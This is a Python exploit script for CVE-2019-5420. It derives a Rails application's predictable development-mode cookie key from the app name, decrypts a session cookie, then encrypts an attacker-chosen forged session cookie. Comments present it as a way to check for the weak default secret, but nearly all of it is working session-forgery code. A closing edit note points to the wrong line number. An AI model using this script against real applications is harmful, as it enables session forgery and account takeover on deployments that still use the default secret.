#!/usr/bin/env python3
#
# Decrypt / tamper / re-encrypt helper for CVE-2019-5420 (Rails cookie store).
#
# Reviewer notes: this only works against an application whose
# secret_key_base is predictable. The key derivation below mirrors the
# Rails 5.2.2 development-mode default referenced from railtie.rb (linked
# next to COOKIE_SALT), where the secret is derived from the application
# class name. A deployment using a randomly generated secret_key_base
# yields a different key, GCM tag verification fails, and the script stops
# with "Decode failed" -- that is the mitigation. The session cookie format
# handled here is three "--"-separated, base64 fields: ciphertext, IV and
# GCM auth tag. If a cookie decrypts with this script, the app is running
# with the weak default and must be reconfigured.
import base64
import hashlib
import sys
import urllib.parse

from Cryptodome.Cipher import AES

# Fixed salt Rails feeds to its key generator for the authenticated
# (AES-GCM) cookie encryptor, see
# https://github.com/rails/rails/blob/v5.2.2/actionpack/lib/action_dispatch/railtie.rb#L22
COOKIE_SALT = b"authenticated encrypted cookie"


def derive_key(app_name: str) -> bytes:
    """Re-create the cookie encryption key from the Rails application name.

    The name is normalised to ``<Name>::Application`` if the suffix is
    missing, hashed with MD5 (the development-mode stand-in for
    secret_key_base), then stretched with PBKDF2-HMAC-SHA1, 1000
    iterations, to a 32-byte AES key using COOKIE_SALT. A real, random
    secret_key_base cannot be reproduced this way.
    """
    if "::Application" not in app_name:
        app_name = f"{app_name}::Application"
    secret_key_base = hashlib.md5(app_name.encode()).hexdigest()
    return hashlib.pbkdf2_hmac(
        "sha1", secret_key_base.encode(), COOKIE_SALT, 1000, dklen=32
    )


def split_cookie(raw_cookie: str) -> tuple[bytes, bytes, bytes]:
    """Return ``(ciphertext, iv, auth_tag)`` decoded from a URL-encoded cookie.

    Layout per
    https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_encryptor.rb#L185
    Raises ValueError (or binascii.Error) when the cookie does not carry
    exactly three base64 fields separated by "--".
    """
    fields = urllib.parse.unquote(raw_cookie).split("--")
    ciphertext, iv, auth_tag = (base64.b64decode(field) for field in fields)
    return ciphertext, iv, auth_tag


def gcm_cipher(key: bytes, iv: bytes):
    """Build a fresh AES-GCM cipher object for one encrypt or decrypt pass."""
    return AES.new(key, AES.MODE_GCM, nonce=iv)


def build_cookie(key: bytes, iv: bytes, plaintext: str) -> str:
    """Encrypt *plaintext* under *key* and return the URL-encoded cookie string.

    The IV of the cookie that was read is reused here to keep the original
    script's behaviour. NOTE(review): nonce reuse under GCM is unsafe in a
    real encryptor; Rails generates a fresh random IV per message.
    """
    ciphertext, auth_tag = gcm_cipher(key, iv).encrypt_and_digest(plaintext.encode())
    joined = "--".join(
        base64.b64encode(part).decode() for part in (ciphertext, iv, auth_tag)
    )
    return urllib.parse.quote(joined)


def main() -> None:
    """Interactive flow: derive key, decrypt a cookie, then encrypt a replacement.

    Exits with status -1 when GCM tag verification (or text decoding of the
    plaintext) fails, which is the expected outcome against an app with a
    properly random secret_key_base.
    """
    key = derive_key(input("Provide App name: "))
    ciphertext, iv, auth_tag = split_cookie(input("Provide session cookie value: "))

    cipher = gcm_cipher(key, iv)
    plaintext = cipher.decrypt(ciphertext)
    try:
        # verify() raises ValueError on tag mismatch; a non-UTF-8 plaintext
        # also lands here because UnicodeDecodeError subclasses ValueError.
        cipher.verify(auth_tag)
        print("Here's your decoded cookie:")
        print(plaintext.decode())
    except ValueError:
        print("Decode failed")
        sys.exit(-1)

    replacement = input("\nProvide forged session cookie: ")
    print("Here's your forged cookie:")
    print(build_cookie(key, iv, replacement))


if __name__ == "__main__":
    main()
Replace line 10, `from Cryptodome.Cipher import AES`, with `from Crypto.Cipher import AES`.